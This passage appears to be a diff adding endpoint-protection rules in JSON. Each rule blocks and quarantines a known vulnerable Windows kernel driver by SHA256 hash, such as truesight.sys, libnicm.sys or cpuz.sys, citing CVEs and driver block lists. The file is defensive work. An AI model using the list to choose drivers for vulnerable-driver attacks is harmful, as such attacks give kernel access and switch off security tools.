+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815408Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ced779242a0df8d09e007d83bd896b2b672d157fcc8ebd6e27892c5ce3fb59a5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34336957-e66d-5822-b387-3f02c0544a5f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975570Z",
+ "creation_date": "2026-03-23T11:45:29.975572Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975577Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "343a332a-a065-580d-9e42-99cdb28c7899",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815290Z",
+ "creation_date": "2026-03-23T11:45:31.815292Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815298Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd7f5c0dbc7d8ee58c0b8aa7893b05163f4c242d5e9a117ea03489867d6c5703",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3442e17b-100a-52ef-8cc6-567c57d504d5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473940Z",
+ "creation_date": "2026-03-23T11:45:30.473950Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473959Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "affeec7af311ecb53182dc6b28c61057eeb6dbd895f92354310f775cf843cfec",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "346785cb-00bb-5a00-a600-47bce4b3ebb3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611270Z",
+ "creation_date": "2026-03-23T11:45:29.611272Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611277Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b9090296a10225be115810e29e8ada4f70e4d4a8f88b385ccd9a8a6d2eb6778",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3467c84c-d8cb-57f6-b677-6b356750e5d5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822618Z",
+ "creation_date": "2026-03-23T11:45:30.822620Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822625Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9acd27f9b7b3075e5d5273ae285de33844aafe0477782ecd4ae573ed282f863a",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3471aae7-852f-52b6-86b3-c9640a2d12c2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813451Z",
+ "creation_date": "2026-03-23T11:45:31.813454Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813462Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "90546d46b8a417fc97d51360aa02c4de0f7973d0967ed89dadaa41230bafacd3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "349897d8-44ae-5c5d-bd69-4b5bf73a1e0c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813685Z",
+ "creation_date": "2026-03-23T11:45:31.813687Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813692Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "376fce1d2509f18bc1506a516cec3a9c8ea86a08691173eb3c312e369d6e3514",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "349b51f6-d603-5a7d-bf2a-eb2dbd2dc021",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144545Z",
+ "creation_date": "2026-03-23T11:45:31.144547Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144553Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "99b8638935d89b108073ba90d3cb422aefe1017bf28b1a875728467c78d83adf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34a0c0c4-5b33-5bb5-a7f1-6f939eabefcc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476461Z",
+ "creation_date": "2026-03-23T11:45:30.476464Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476474Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f27febff1be9e89e48a9128e2121c7754d15f8a5b2e88c50102cecee5fe60229",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34a98a07-2883-51ec-8f1f-d4032355e4fd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836559Z",
+ "creation_date": "2026-03-23T11:45:30.836561Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836566Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ccfdd6b8d4fe83b4327e398a9af9ed7df6cb7d79fe5d11423b9e87da1ec51a78",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34b4451f-5ab1-5c5c-9379-a5ec8fd4d20d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145659Z",
+ "creation_date": "2026-03-23T11:45:31.145661Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145667Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82fb3ea70d7762e6f2ce380700d0164c869d233c660e3370057c5b87cd3f70f5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34b967db-db08-5b6f-a277-558c0e50353f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809392Z",
+ "creation_date": "2026-03-23T11:45:31.809395Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809403Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f4c030e7fd706e8b12521c9d2b0547d8d0c529088e45328a79936b922e88124e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34bc5b45-b452-5baf-9307-575551abd473",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971678Z",
+ "creation_date": "2026-03-23T11:45:29.971680Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971685Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e5316670c0bddc0519ef96b2db89285a8620a260429a97f9d2cf5b58b0287d91",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34bfeb17-d72c-5324-8967-04d517c28f57",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148642Z",
+ "creation_date": "2026-03-23T11:45:31.148644Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148650Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c2c1357cea813ee63c6411dc97ebb5ea5ac0bb53062ca220054c85524d1b544a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34c87cc4-4c84-5999-b4c3-bb1fb4c2743d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979134Z",
+ "creation_date": "2026-03-23T11:45:29.979136Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979141Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6",
+ "comment": "Vulnerable Kernel Driver (aka elrawdsk.sys) [https://www.loldrivers.io/drivers/205721b7-b83b-414a-b4b5-8bacb4a37777/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34c9f06f-57d8-573b-886d-20a488f24e90",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811345Z",
+ "creation_date": "2026-03-23T11:45:31.811347Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811353Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2774201da4346d65def60845228d89663de37c880b5d55c9abbb3ba9662a275c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34cf753c-1329-5288-b9ce-0d6ee398b8a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143355Z",
+ "creation_date": "2026-03-23T11:45:32.143357Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143362Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c857c2db1fe1b9c979079add29d5b970147d6a264b4095e6579b5d0669c2b572",
+ "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34d3bc6b-1583-518b-a70e-827d9ea3a7a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475411Z",
+ "creation_date": "2026-03-23T11:45:31.475415Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475425Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7781540202aa5ef6992f9293a77b08043d350ca58e00f5bfa30afdb4b8e57f54",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34d68b0d-738b-5323-be19-fda81fd8ca1e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977997Z",
+ "creation_date": "2026-03-23T11:45:29.977999Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978004Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "350e15bf24dcfdc052db117718329a03e930c17ac8c835e51d001e74bad784e4",
+ "comment": "Vulnerable Kernel Driver (aka LgDCatcher.sys) [https://www.loldrivers.io/drivers/a8e999ee-746f-4788-9102-c1d3d2914f56/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34e48092-15b4-5cbe-b10a-ceb9ceaf5430",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458164Z",
+ "creation_date": "2026-03-23T11:45:30.458167Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0b6a410c22cc36f478ff874d4a23d2e4b4e37c6e55f2a095fc4c3ef32bcb763",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34f1b644-0803-53df-9e78-153cd3a3cf5f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835206Z",
+ "creation_date": "2026-03-23T11:45:30.835209Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835219Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a2bdf9e7e737444d1acec610729ddbb485f98931ccb86adaac65ec35473a46a3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "351150ff-0ac1-51cf-9928-e773063cdf98",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145107Z",
+ "creation_date": "2026-03-23T11:45:31.145110Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145115Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
